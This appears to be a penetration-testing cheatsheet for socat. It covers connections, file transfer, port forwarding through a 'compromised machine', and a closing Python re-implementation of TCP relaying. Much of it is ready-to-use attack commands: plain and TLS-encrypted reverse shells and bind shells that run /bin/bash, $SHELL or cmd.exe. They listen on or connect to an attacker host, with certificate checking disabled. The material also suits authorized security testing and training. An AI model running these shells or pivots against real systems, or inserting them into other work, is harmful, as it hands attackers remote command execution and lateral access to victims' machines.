Socat works by opening two bidirectional data streams (read/write), opening them one after the other (blocking until each is established), and then transferring data between the two. Data is only transferred when one stream has new data to read and the other is accepting input for writing; otherwise the new data is left unread until the other stream accepts input.

Confusing Syntax Warning!

socat's command-line arguments seemed very non-intuitive to me at first.

Protocol names are case-insensitive

Protocol names, directives such as EXEC, etc. are written in upper case throughout this cheatsheet for consistency, but socat does not require it.

Connect to Remote

socat - TCP4:$REMOTE_IP:$REMOTE_PORT

Listen on Host

socat TCP4-LISTEN:$HOST_PORT STDOUT

TCP4-LISTEN can be abbreviated to TCP4-L or even TCP-L.

File

On the file source (sender)

socat TCP-L:$SRC_PORT,fork file:$SRC_FILE

On the file destination (receiver)

socat TCP4:$SRC_IP:$SRC_PORT file:$DST_FILE,create

Reverse shell

On host (attacker)

socat -d -d TCP4-LISTEN:$HOST_PORT STDOUT

On remote

socat TCP4:$HOST_IP:$HOST_PORT EXEC:/bin/bash

Encrypted bind shell


On remote, first use this OpenSSL command to generate a certificate and key pair for encryption, then combine them into a single .pem file, which socat requires.

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 362 -out bind_shell.crt
cat bind_shell.key bind_shell.crt >bind_shell.pem
  • -nodes: key stored without password
  • -x509: self-signed certificate, i.e. this will not be a certificate request

Then start the listener on remote. Note that verify=0 disables certificate checking, so the TLS layer here encrypts the traffic but does not authenticate either end.

socat OPENSSL-L:$REMOTE_PORT,cert=bind_shell.pem,verify=0,fork EXEC:$SHELL

cmd.exe

If the shell is cmd.exe, then an additional pipes option is needed (e.g., EXEC:cmd.exe,pipes)

On host

socat - OPENSSL:$REMOTE_IP:$REMOTE_PORT,verify=0

Encrypted reverse shell

On host, generate a certificate (see Encrypted bind shell):

openssl req -newkey rsa:2048 -nodes -keyout rev_shell.key -x509 -days 362 -out rev_shell.crt
cat rev_shell.key rev_shell.crt >rev_shell.pem

On host, start listener

socat OPENSSL-LISTEN:$HOST_PORT,cert=rev_shell.pem,verify=0,fork STDOUT

On remote

socat OPENSSL:$HOST_IP:$HOST_PORT,verify=0,fork EXEC:$SHELL

cmd.exe

If the shell is cmd.exe, then an additional pipes option is needed (e.g., EXEC:cmd.exe,pipes)

SSLify Server

socat OPENSSL-LISTEN:443,reuseaddr,pf=ip4,fork,cert=server.pem,cafile=client.crt TCP4-CONNECT:localhost:80

This wraps the plaintext service on localhost:80 in TLS on port 443: cert= supplies the server's own certificate and key, and cafile= makes socat verify each connecting client's certificate against client.crt (peer verification is on by default, so there is no verify=0 here).

Port Forwarding

See also: port forwarding. Assuming socat has been transferred onto the compromised machine:

socat TCP4-LISTEN:1234,fork TCP4:1.1.1.1:4321

This allows the attacker to forward traffic in the following way:

graph LR
    A[Attacker Port X] ---> B[Compromised Host Port 1234] ---> C[Target Host Port 4321]
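The forwarding model above, together with the transfer loop described in the opening paragraph, as an added example that is not part of the original cheatsheet or of socat itself: a small Python re-implementation of TCP4-LISTEN:...,fork TCP4:... that uses a thread per client where socat forks a process, with a constructed loopback echo service standing in for the target host. The function names and the OS-chosen ephemeral ports are this example's own assumptions.

```python
import selectors
import socket
import threading

def relay(a: socket.socket, b: socket.socket) -> None:
    """socat's transfer loop, reduced: wait until either stream has data and
    hand it to the other. sendall() blocks until the peer accepts the chunk,
    so the source is not read again until then (socat additionally polls
    for write readiness instead of blocking; that refinement is omitted)."""
    sel = selectors.DefaultSelector()
    peer = {a: b, b: a}
    for s in (a, b):
        sel.register(s, selectors.EVENT_READ)
    try:
        while True:
            for key, _ in sel.select():
                data = key.fileobj.recv(4096)
                if not data:  # EOF on either stream ends the transfer
                    return
                peer[key.fileobj].sendall(data)
    finally:
        sel.close(); a.close(); b.close()

def listener(handler) -> int:
    """Bind an ephemeral 127.0.0.1 port and run handler(conn) in a thread per
    client, the role socat's ',fork' option plays; returns the port."""
    ls = socket.socket()
    ls.bind(("127.0.0.1", 0))
    ls.listen()

    def accept_loop():
        while True:
            conn, _ = ls.accept()
            threading.Thread(target=handler, args=(conn,), daemon=True).start()

    threading.Thread(target=accept_loop, daemon=True).start()
    return ls.getsockname()[1]

def forward(target: tuple) -> int:
    """TCP4-LISTEN:<port>,fork TCP4:host:port, with the port chosen by the OS."""
    return listener(lambda conn: relay(conn, socket.create_connection(target)))

def echo(conn: socket.socket) -> None:  # constructed stand-in for "Target Host Port 4321"
    with conn:
        conn.sendall(conn.recv(4096))

def roundtrip(port: int, payload: bytes) -> bytes:  # the "Attacker Port X" side
    with socket.create_connection(("127.0.0.1", port)) as c:
        c.sendall(payload)
        return c.recv(4096)
```

Start the stand-in target with listener(echo), point forward() at it, and each roundtrip() call is one client passing through the relay; a second call confirms that the listener keeps accepting after the first session ends, as ,fork does.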